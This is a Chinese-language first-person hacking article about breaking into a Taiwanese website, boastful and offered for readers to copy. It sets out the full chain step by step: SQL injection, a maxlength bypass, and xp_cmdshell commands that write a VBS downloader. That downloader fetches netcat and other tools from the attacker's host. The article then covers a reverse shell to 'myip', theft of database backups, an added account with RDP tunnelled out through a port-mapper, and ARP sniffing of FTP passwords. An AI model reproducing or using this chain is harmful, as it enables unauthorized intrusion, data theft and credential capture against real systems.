很久沒有入侵了，手有點癢，隨便逛了幾個TW的網(wǎng)站想找一個有點的價值的網(wǎng)站玩玩，于是找到了這個網(wǎng)站。 習(xí)慣性的，在“報名賬號”處填入了一個單引號，返回了如下信息： SQL Server 的 Microsoft OLE DB 提供者 (0x80040E14) 遺漏字符字符串 ''' 前面的引號。 /rdshow/modify.asp, line 5 看來是存在注入漏洞的，來看看權(quán)限如何。繼續(xù)在登陸口輸入’ and user>0 and ‘’=’，問題出現(xiàn)了：無法完整輸入。看來網(wǎng)頁對輸入長度做了限制，這個難不到我。保存網(wǎng)頁，將網(wǎng)頁的源代碼更改兩個地方，一處是Action＝modify.asp改為Action＝ [url=http://www.xxx.org.tw/rdshow/modify.asp]http://www.xxx.org.tw/rdshow/modify.asp[/url] ，還有一處就是把輸入字符的長度改大，也就是maxlength＝10改為100，這下可以不受限制的隨便輸入了。將剛才的代碼完整輸入后得到以下信息： SQL Server 的 Microsoft OLE DB 提供者 (0x80040E07) 將 nvarchar 數(shù)值 'dbo' 轉(zhuǎn)換成數(shù)據(jù)型別為 int 的數(shù)據(jù)行語法錯誤。 /rdshow/modify.asp, line 5 看來有戲，但是這樣注入太麻煩了。再看看網(wǎng)頁的源代碼，如果將這個注入漏洞轉(zhuǎn)化成URL的形式，這樣注入就方便多了。同時轉(zhuǎn)化后還有一個很好的優(yōu)點，就是可以使用NBSI之類的注入工具，大大簡化了我們的注入過程。轉(zhuǎn)化后的URL為 [url=http://www.xxx.org.tw/rdshow/]http://www.xxx.org.tw/rdshow/[/url] modify.asp？bidno=f**k?，F(xiàn)在WEB和SQL的主機分開的情況很多，首先我們還是先看看數(shù)據(jù)庫的IP地址吧。打開天網(wǎng)，然后在IE提交： [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k’;exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k’;exec[/url] master.dbo.xp_shell’ ping myip’;-- 從天網(wǎng)的報警日志看出數(shù)據(jù)庫的IP地址為210.208.xxx.253，再Ping [url=http://www.xxx.org.tw]www.xxx.org.tw[/url] ，得到的IP地址卻為210.208.xxx.32，看來數(shù)據(jù)庫和WEB服務(wù)器不是同一臺主機，但是從IP分布來看，這兩臺主機處于同一個網(wǎng)段，理論上只要我們能攻占下數(shù)據(jù)庫主機，要滲透到WEB服務(wù)器也不是難事（后來證明確實如此）。到了這一步，還是先用Superscan掃描一下數(shù)據(jù)庫主機開了些什么端口吧。 小提示：先對數(shù)據(jù)庫服務(wù)器掃描的好處有很多，比如可以探測對方是否開了防火墻，是否有FTP或者WEB服務(wù)，這樣才能確定下一步該怎么注入。 掃描的結(jié)果是數(shù)據(jù)庫有防火墻，我的想法是先上傳一個NC上去，先得到一個反向的Shell再說。我嘗試了很多方法才傳上去，先用Tftp沒有成功，F(xiàn)TP也沒有成功。如果數(shù)據(jù)庫有WEB服務(wù)的話還可以寫入一個WebShell，可惜沒有。沒有辦法，只好寫Iget.vbs（腳本小子：廣告時間！黑防上個月開放的下載系統(tǒng)中有下載，地址是 [url=http://www.hacker.com.cn/downweb/index.asp]www.hacker.com.cn/downweb/index.asp[/url] ，里面還有一些小東西也挺不錯，歡迎大家下載使用，并推薦你覺得功能上有特點的程序），然后讓對方下載我WEB服務(wù)器上的NC。好，決定后就這樣做，繼續(xù)在IE提交： [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo iLocal = LCase(WScript.Arguments(1)) > c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo iRemote = LCase(WScript.Arguments(0)) >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo Set xPost = CreateObject("Microsoft.XMLHTTP") >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo xPost.Open "GET",iRemote,0 >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo xPost.Send() >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo Set sGet = CreateObject("ADODB.Stream") >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo sGet.Mode = 3 >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo sGet.Type = 1 >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo sGet.Open() >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo sGet.Write(xPost.responseBody) >> c:\winnt\system\p.vbs';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell'echo sGet.SaveToFile iLocal,2 >>c:\winnt\system\p.vbs';-- 現(xiàn)在把NBSI2請出來，用其自帶的NB command命令執(zhí)行器查看VBS是否寫入成功（用NB TreeList目錄列表工具也可以，不過要等半天才能等到結(jié)果，我的性子急，所以選擇了前者）。 可以看出VBS生成成功了，現(xiàn)在我們可以用這個VBS去下載后門木馬之類的東西了。話不多說先把Tlist，NC，Kill傳上去再說，繼續(xù)在IE提交如下URL： [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs [url=http://myip/nc.exe]http://myip/nc.exe[/url] nc.exe';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs [url=http://myip/kill.exe]http://myip/kill.exe[/url] kill.exe';-- [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell 'c:\winnt\system\p.vbs [url=http://myip/tlist.exe]http://myip/tlist.exe[/url] tlist.exe';-- 現(xiàn)在我們可以利用上傳的NC得到一個反向的Shell了，先在本機用NC監(jiān)聽8000端口： Nc.exe –l –v –p 8000 然后在IE輸入： [url=http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec]http://www.xxx.org.tw/rdshow/modify.asp?bidno=f**k';exec[/url] master.dbo.xp_cmdshell 'c:\winnt\system\nc.exe –e cmd.exe myip 8000 ';-- 這樣我們就獲得了一個CmdShell了。 為什么我要上傳Tlist呢？因為我想知道對方用的是什么殺毒軟件，這樣我們才能做到有的放矢，不至于我們上傳的東東全部被查殺。上傳Tlist還有一個原因就是剛剛開始我在繞過對方的防火墻時調(diào)用了FTP，為了不讓對方懷疑，我必須把它Kill掉，所以也得上傳Tlist來看看PID號。Tlist的結(jié)果是對方用的諾頓。 小提示：獲取對方系統(tǒng)的殺毒軟件對后面的入侵是很有幫助的，因為不同的殺毒軟件對不同的黑軟定義的特征碼是不一樣的，也就是說某些黑軟不被金山查殺，不代表可以瞞過諾頓，反之一樣。 暈了，我菜，只會找瑞星的特征碼，諾頓的找不出來，想傳幾個反彈木馬上去的想法放棄了。上去溜了一圈發(fā)現(xiàn)D盤下面有不少數(shù)據(jù)庫的備份，我喜歡，先Down下來再說。但新的問題又來了，Tftp和TTP不能用，對方又有硬件防火墻，而Iget.vbs又只能下載，沒有辦法上傳東西，反彈木馬可以實現(xiàn)上傳但對方又有殺毒軟件……現(xiàn)在我的思路開始陷入困境，正在我一籌莫展的時候我想到了飯哥，他應(yīng)該有點好東東可以解決我的這個問題吧？把大概情況給他說了之后，他仰天大笑三聲之后給了我一個他自己寫的小工具：HttpPut，這個工具可以將對方的文件傳到自己的電腦上來，簡單方便。使用方法為： Useag:E:\HttpPut.exe [URL] [PutFilePath] Sample:E:\HttpPut.exe [url=http://hostname/images/]http://hostname/images/[/url] c:\p.txt 先傳了幾個Word文件，一切正常，但是當(dāng)我傳到后面較大的數(shù)據(jù)庫文件時卻發(fā)現(xiàn)不太穩(wěn)定，Shell很容易掛掉，嘗試了很多次都這樣（汗，這時進程里面多了X個Cmd.exe，幸好我上傳了Tlist和Kill，把那些掛了的CMD一個一個地Kill掉）。 又一次陷入了困境，我本來想再去各大黑客網(wǎng)站找最新的反彈木馬，但是老天偏偏和我作對，找了半天都找不到一個滿意的。就在我快絕望的時候我的眼前突然一亮：NC不就可以突破防火墻傳文件嗎？不然怎么叫瑞士軍刀？看來我是騎驢找驢了。在NC的高級應(yīng)用里面就有傳文件的方法，具體命令如下： nc －vv -l -p port > pathfile　　 nc -d myip port 然后用Winrar將所有文件（5個）打包為自解壓的exe，并將“高級自解壓選項”->“解壓后運行”設(shè)置為_wpcap_.bat，命令行的Winpcap安裝包就制作完成了。 以上方法只是給大家參考，此時我已經(jīng)有了另外的更加簡單方便的思路，就是給數(shù)據(jù)庫的主機開終端服務(wù)，這樣無論是傳東西還是繼續(xù)向內(nèi)網(wǎng)的滲透都會方便很多。大家也許會問即使你有權(quán)限添加賬號能開終端服務(wù)，但是對方有防火墻你怎么連接啊。呵呵，這個問題其實很好解決，相信大家都知道VIDC類軟件吧，這類軟件的作用就是將內(nèi)網(wǎng)的端口映射到公網(wǎng)的IP端口上來，這樣我們只需要連接公網(wǎng)的IP就可以連接到內(nèi)網(wǎng)去了。在這里我用的是yyc寫的VIDC軟件的修改版， 小知識：yyc寫的VIDC軟件的修改版分客戶端和服務(wù)器端，服務(wù)器端Idc.exe在具有公網(wǎng)IP的肉雞上運行，使用默認8080端口通信。 直接在肉雞運行就OK了，客戶端vIDCc.exe、vIDCc.DLL，xl.ini文件，按INI文件里的配置自動連接綁定端口，INI的內(nèi)容如下： Serverip＝公網(wǎng)IP Serverport＝8080 Cip＝127.0.0.1 Bport=21|80|3389 Yport=7779|7776|7778 先還是用Iget.vbs將這些東西傳上去，然后在CmdShell里面添加一個賬號，然后寫一個BAT開啟3389，等電腦重啟之后再上去運行vIDCc.exe。OK大功告成，我們只要登陸肉雞的7778端口就可以訪問內(nèi)網(wǎng)數(shù)據(jù)了。 呵呵，現(xiàn)在我們可以在圖形界面下安裝Winpcap了，我們已經(jīng)完全控制了數(shù)據(jù)庫，但是任務(wù)還沒有完，我們先看看能不能嗅探到WEB服務(wù)器的信息。先執(zhí)行下面的命令： tracert 210.208.xxx.32（WEB服務(wù)器的地址） 看看返回結(jié)果看來有戲，三下五除二裝好Winpcap，然后開始ArpSniffer，嗅探的命令為： Usage: ArpSniffer [/RESET] 在這里我監(jiān)聽的是21端口，命令如下： Arpsniffer 210.208.xxx.1 210.208.xxx.32 21 c:\winnt\system\pass.txt 1 接下來就是等待了，不過臭要飯的急著催文章，所以文章截至?xí)r還沒有結(jié)果，如果大家有興趣的話，下期我再告訴大家。這次簡單任務(wù)也該結(jié)束了，下期見！

最新評論